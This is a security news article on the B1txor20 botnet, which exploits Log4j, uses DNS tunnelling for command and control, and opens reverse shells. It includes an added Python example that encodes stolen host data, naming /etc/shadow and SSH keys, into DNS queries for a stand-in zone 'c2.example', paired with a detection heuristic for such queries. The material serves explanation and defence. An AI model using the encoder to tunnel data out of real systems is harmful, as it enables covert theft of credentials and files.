Researchers have observed a new botnet malware that exploits the Log4j vulnerability to target Linux systems. It attempts to steal sensitive data, create reverse shells, and install rootkits.

The B1txor20 botnet

According to 360 Netlab, the botnet, named B1txor20, was first spotted on February 9.
  • It targets Linux devices on the ARM and x64 CPU architectures.
  • It exploits the vulnerability in the Apache Log4j logging library to compromise new hosts.
  • In addition to the usual backdoor capabilities, it can act as a SOCKS5 proxy, download other malware, execute arbitrary commands, and install rootkits.

DNS tunneling-based attack

B1txor20 uses DNS tunneling to communicate with its C2 server, which makes its traffic hard to tell apart from ordinary name resolution.
  • The bot encodes stolen information, the output of executed commands, or any other data into DNS requests that it sends to its C2 server.
  • The C2 answers those requests over the DNS protocol, carrying the desired payload back to the infected device in the responses.
Because the exchange looks like normal name resolution, detection has to rely on the shape of the queries (length, entropy, volume per domain) rather than on blocked ports or protocols.
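The following is an added example, not code from 360 Netlab's analysis or the B1txor20 sample. It models the uplink side of a DNS tunnel the way any such bot must build it (data encoded into label-safe base32, split into 63-byte labels under a 253-byte name, sequence-numbered for reassembly), the matching C2-side reassembly, and a resolver-log heuristic that flags zones receiving long, high-entropy, mostly unique subdomains. The encoding scheme, the zone `c2.example`, the bot id, the thresholds and the log lines are all assumptions.

```python
"""DNS-tunnelled C2: bot-side uplink encoding, C2-side reassembly, and a
resolver-log heuristic for the query shape this produces.
Added example; the scheme, zone c2.example, bot id and log lines are assumptions,
not B1txor20's actual protocol."""
import base64
import math
from collections import Counter, defaultdict

C2_ZONE = "c2.example"     # hypothetical attacker-controlled zone
MAX_LABEL = 63             # RFC 1035 label length limit
LABELS_PER_QUERY = 2       # 2 payload labels + header + zone stays well under 253 octets


def encode_exfil(data: bytes, bot_id: str = "bot01", zone: str = C2_ZONE) -> list[str]:
    """Turn stolen bytes into the query names a bot would resolve.
    base32 is used because DNS names are case-insensitive and must be label-safe;
    a leading sequence label lets the C2 reorder and reassemble."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    queries = []
    for seq, i in enumerate(range(0, len(labels), LABELS_PER_QUERY)):
        payload = ".".join(labels[i:i + LABELS_PER_QUERY])
        queries.append(f"{seq}.{bot_id}.{payload}.{zone}")
    return queries


def decode_exfil(queries, zone: str = C2_ZONE) -> bytes:
    """C2-side reassembly: drop the zone, read the sequence label, join in order."""
    parts = {}
    for q in queries:
        if not q.endswith("." + zone):
            continue
        labels = q[:-len(zone) - 1].split(".")
        parts[int(labels[0])] = "".join(labels[2:])   # labels[1] is the bot id
    b32 = "".join(parts[k] for k in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)                      # restore padding the bot stripped
    return base64.b32decode(b32)


def shannon_entropy(s: str) -> float:
    """Bits per symbol of the character histogram: hostnames score low, encoded data high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def zone_of(name: str) -> str:
    """Crude registered-domain guess: last two labels (a real detector uses a public suffix list)."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def flag_tunnel_zones(query_names, min_unique=3, min_sub_len=40, min_entropy=3.0):
    """Flag zones whose queries carry long, high-entropy and mostly unique subdomains,
    the shape tunnelled data produces and ordinary hostnames do not."""
    subs = defaultdict(list)
    for name in query_names:
        zone = zone_of(name)
        subs[zone].append(name[:-len(zone)].rstrip("."))
    flagged = {}
    for zone, seen in subs.items():
        uniq = set(seen)
        if len(uniq) < min_unique:
            continue
        mean_len = sum(map(len, uniq)) / len(uniq)
        mean_ent = sum(shannon_entropy(s.replace(".", "")) for s in uniq) / len(uniq)
        if mean_len >= min_sub_len and mean_ent >= min_entropy:
            flagged[zone] = {"queries": len(seen), "mean_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2)}
    return flagged


# Constructed sample: ordinary lookups plus one bot exfiltrating a host fingerprint.
STOLEN = (
    b"hostname=iot-gw-01\nkernel=5.4.0-1045-raspi aarch64\nuid=0(root)\n"
    b"ifaces=eth0:192.0.2.10,wlan0:192.0.2.11\n"
    b"procs=sshd,dnsmasq,hostapd,java -jar collector.jar\n"
    b"shell=/bin/sh\nfiles=/etc/shadow,/root/.ssh/id_rsa,/etc/wpa_supplicant.conf\n"
)
BENIGN = ["www.google.com", "mail.example.org", "cdn.jsdelivr.net", "www.google.com",
          "api.github.com", "ntp.ubuntu.com"]
SAMPLE_LOG = BENIGN + encode_exfil(STOLEN)

if __name__ == "__main__":
    for q in encode_exfil(STOLEN):
        print(len(q), q[:60] + "...")
    print(flag_tunnel_zones(SAMPLE_LOG))
```

The heuristic only covers the uplink; the downlink in a real tunnel rides in answer records (TXT, NULL or similar) and needs the same kind of size and rate profiling on responses. Expect tuning: CDNs, anti-malware lookup services and DNS blocklists also generate long, high-entropy subdomains, and a slower tunnel with shorter labels will sit under these thresholds, so volume per zone over time is the more robust signal.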

Malware still under development

The malware contains a number of additional features that are either disabled or buggy, which suggests that it is still under development.
  • It carries code for functions such as uploading specific information and delivering information over a Unix domain socket, but that code is never used during execution.
  • Some of the implemented functionality is buggy: the malware deletes the socket file right after binding the domain socket, so the binding is never put to any effective use.

Ending notes

Neither DNS tunneling nor Log4j exploitation is new, but both remain effective for botnet operators. The unfinished modules show that the developers intend to keep extending this malware, which makes it a growing threat to Linux-based IoT devices.
Publisher: Cyware